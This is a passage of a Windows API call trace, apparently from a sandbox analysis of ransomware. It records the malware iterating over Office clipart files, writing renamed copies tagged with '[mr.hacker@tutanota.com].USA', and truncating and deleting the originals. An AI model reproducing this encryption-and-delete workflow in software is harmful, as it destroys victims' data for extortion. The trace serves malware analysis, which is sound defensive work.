(lpString1=".bz2", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString=".7z") returned 3 [0269.482] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.482] lstrlenW (lpString=".dbf") returned 4 [0269.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.482] lstrlenW (lpString=".1cd") returned 4 [0269.482] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.482] lstrlenW (lpString=".jpg") returned 4 [0269.482] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.482] lstrlenW (lpString=".doc") returned 4 [0269.482] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString=".docx") returned 5 [0269.482] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.482] lstrlenW (lpString=".pdf") returned 4 [0269.482] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString=".xls") returned 4 [0269.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.482] lstrlenW (lpString=".xlsx") returned 5 [0269.482] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.482] lstrlenW (lpString=".ppt") returned 4 [0269.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.483] lstrlenW (lpString=".zip") returned 4 [0269.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.483] lstrlenW (lpString=".rar") returned 4 [0269.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.483] lstrlenW (lpString=".bz2") returned 4 [0269.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.483] lstrlenW (lpString=".7z") returned 3 [0269.483] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.483] lstrlenW (lpString=".dbf") returned 4 [0269.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.483] lstrlenW (lpString=".1cd") returned 4 [0269.483] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.483] lstrlenW (lpString=".jpg") returned 4 [0269.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.483] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.483] lstrlenW (lpString="DD01171_.WMF") returned 12 [0269.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.484] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2052) returned 1 [0269.484] CloseHandle (hObject=0x390) returned 1 [0269.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 0x20 [0269.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.484] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.484] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0269.485] GetLastError () returned 0x0 [0269.485] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x804, lpOverlapped=0x0) returned 1 [0269.492] WriteFile (in: hFile=0x398, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x810, lpOverlapped=0x0) returned 1 [0269.493] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.493] WriteFile (in: hFile=0x398, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.493] SetEndOfFile (hFile=0x398) returned 1 [0269.546] CloseHandle (hObject=0x398) returned 1 [0269.829] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.829] SetEndOfFile (hFile=0x390) returned 1 [0270.041] CloseHandle (hObject=0x390) returned 1 [0270.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 1 [0270.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.042] lstrlenW (lpString=".doc") returned 4 [0270.042] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.042] lstrlenW (lpString=".docx") returned 5 [0270.042] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.042] lstrlenW (lpString=".pdf") returned 4 [0270.042] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.043] lstrlenW (lpString=".xls") returned 4 [0270.043] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.043] lstrlenW (lpString=".xlsx") returned 5 [0270.043] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.043] lstrlenW (lpString=".ppt") returned 4 [0270.043] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.043] lstrlenW (lpString=".zip") returned 4 [0270.043] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.043] lstrlenW (lpString=".rar") returned 4 [0270.043] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.043] lstrlenW (lpString=".bz2") returned 4 [0270.043] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.043] lstrlenW (lpString=".7z") returned 3 [0270.043] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.043] lstrlenW (lpString=".dbf") returned 4 [0270.043] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.043] lstrlenW (lpString=".1cd") returned 4 [0270.043] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.043] lstrlenW (lpString=".jpg") returned 4 [0270.043] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.044] lstrlenW (lpString=".doc") returned 4 [0270.044] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.044] lstrlenW (lpString=".docx") returned 5 [0270.044] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.044] lstrlenW (lpString=".pdf") returned 4 [0270.044] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.044] lstrlenW (lpString=".xls") returned 4 [0270.044] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.044] lstrlenW (lpString=".xlsx") returned 5 [0270.044] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.044] lstrlenW (lpString=".ppt") returned 4 [0270.044] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.044] lstrlenW (lpString=".zip") returned 4 [0270.044] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.044] lstrlenW (lpString=".rar") returned 4 [0270.045] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.045] lstrlenW (lpString=".bz2") returned 4 [0270.045] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.045] lstrlenW (lpString=".7z") returned 3 [0270.045] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.045] lstrlenW (lpString=".dbf") returned 4 [0270.045] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.045] lstrlenW (lpString=".1cd") returned 4 [0270.045] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0270.045] lstrlenW (lpString=".jpg") returned 4 [0270.045] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.045] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.045] lstrlenW (lpString="DD01180_.WMF") returned 12 [0270.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.046] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2084) returned 1 [0270.046] CloseHandle (hObject=0x390) returned 1 [0270.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 0x20 [0270.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.046] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.046] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.049] GetLastError () returned 0x0 [0270.049] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x824, lpOverlapped=0x0) returned 1 [0270.050] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x830, lpOverlapped=0x0) returned 1 [0270.051] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.051] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.051] SetEndOfFile (hFile=0x3a4) returned 1 [0270.051] CloseHandle (hObject=0x3a4) returned 1 [0270.051] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.051] SetEndOfFile (hFile=0x390) returned 1 [0270.053] CloseHandle (hObject=0x390) returned 1 [0270.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.053] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 1 [0270.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.054] lstrlenW (lpString=".doc") returned 4 [0270.054] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.054] lstrlenW (lpString=".docx") returned 5 [0270.054] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.054] lstrlenW (lpString=".pdf") returned 4 [0270.054] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.054] lstrlenW (lpString=".xls") returned 4 [0270.054] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.054] lstrlenW (lpString=".xlsx") returned 5 [0270.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.054] lstrlenW (lpString=".ppt") returned 4 [0270.054] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.054] lstrlenW (lpString=".zip") returned 4 [0270.054] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.054] lstrlenW (lpString=".rar") returned 4 [0270.054] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.054] lstrlenW (lpString=".bz2") returned 4 [0270.054] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.055] lstrlenW (lpString=".7z") returned 3 [0270.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.055] lstrlenW (lpString=".dbf") returned 4 [0270.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.055] lstrlenW (lpString=".1cd") returned 4 [0270.055] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.055] lstrlenW (lpString=".jpg") returned 4 [0270.055] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.055] lstrlenW (lpString=".doc") returned 4 [0270.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.055] lstrlenW (lpString=".docx") returned 5 [0270.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.055] lstrlenW (lpString=".pdf") returned 4 [0270.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.055] lstrlenW (lpString=".xls") returned 4 [0270.056] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.056] lstrlenW (lpString=".xlsx") returned 5 [0270.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.056] lstrlenW (lpString=".ppt") returned 4 [0270.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.056] lstrlenW (lpString=".zip") returned 4 [0270.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.056] lstrlenW (lpString=".rar") returned 4 [0270.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.056] lstrlenW (lpString=".bz2") returned 4 [0270.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.056] lstrlenW (lpString=".7z") returned 3 [0270.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.056] lstrlenW (lpString=".dbf") returned 4 [0270.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.056] lstrlenW (lpString=".1cd") returned 4 [0270.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0270.056] lstrlenW (lpString=".jpg") returned 4 [0270.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.057] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.057] lstrlenW (lpString="DD01181_.WMF") returned 12 [0270.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.058] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1448) returned 1 [0270.058] CloseHandle (hObject=0x390) returned 1 [0270.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 0x20 [0270.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.058] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.058] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.058] GetLastError () returned 0x0 [0270.058] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x5a8, lpOverlapped=0x0) returned 1 [0270.060] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0270.061] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.061] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.061] SetEndOfFile (hFile=0x3a4) returned 1 [0270.061] CloseHandle (hObject=0x3a4) returned 1 [0270.061] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.061] SetEndOfFile (hFile=0x390) returned 1 [0270.064] CloseHandle (hObject=0x390) returned 1 [0270.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.064] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 1 [0270.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.064] lstrlenW (lpString=".doc") returned 4 [0270.064] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.064] lstrlenW (lpString=".docx") returned 5 [0270.064] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.064] lstrlenW (lpString=".pdf") returned 4 [0270.065] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.065] lstrlenW (lpString=".xls") returned 4 [0270.065] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.065] lstrlenW (lpString=".xlsx") returned 5 [0270.065] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.065] lstrlenW (lpString=".ppt") returned 4 [0270.065] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.065] lstrlenW (lpString=".zip") returned 4 [0270.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.065] lstrlenW (lpString=".rar") returned 4 [0270.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.065] lstrlenW (lpString=".bz2") returned 4 [0270.065] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.065] lstrlenW (lpString=".7z") returned 3 [0270.065] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.065] lstrlenW (lpString=".dbf") returned 4 [0270.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0270.065] lstrlenW (lpString=".1cd") returned 4 [0270.066] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.066] 